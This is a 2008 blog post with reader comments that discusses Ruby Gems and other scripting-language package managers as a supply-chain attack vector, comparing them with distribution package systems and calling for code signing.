Tim Bray warns of the dangers of Ruby Gems as an attack vector. The risk is that basically anyone can create a Gem and make it available using the gem installer.
I’ll say that this is why real systems administrators detest the various packaging schemes that scripting languages offer. It’s generally a much better practice to manage libraries through the operating system’s centralized packaging system — Red Hat’s RPM, FreeBSD Ports, Debian/Ubuntu’s APT, and so forth. Administrators who want to go beyond the vendor-approved repositories for packages are free to do so, but packages from the vendor list can be installed with relative confidence.
Who knows what to expect from packages from CPAN, PEAR, RubyForge, and the like? (This also ties into my longer argument about why developers are the natural enemy of the systems administrator, but I’ll get into that some other time.)
September 3, 2008 at 12:24 am
One thing any of these packaging systems should steal from yast, yum, apt, etc. is rudimentary code signing. Even the storied CPAN doesn’t support this. (CPANPLUS does, however.) That would go a long way to stopping various real MITM attacks – and I’m including creative programmers among those in the middle.
Using the bundled modules with distribution signatures as a safety is essentially another trusting-trust problem. Where did they download it? It would be foolish to expect that distribution maintainers vet every library.
September 3, 2008 at 6:10 am
I thought that was supposed to be part of their whole value-add though — because otherwise, why not just use a community-supported distro?
Rafe, I’d love to hear the “developers are the enemy of the sysadmin” post; I’m not sure I agree with you…
September 14, 2008 at 5:10 pm
I’ve only ever seen this as a feature point with security-oriented Linux distributions like Trustix and Engarde. Those distributions tend to base their security model on a framework like SELinux or AppArmor combined with a reduction in packages to reduce the attack surface.
Since many package maintainers seem to handle hundreds of packages it seems improbable that they do a security audit for each. If they do, it’s certainly not documented well.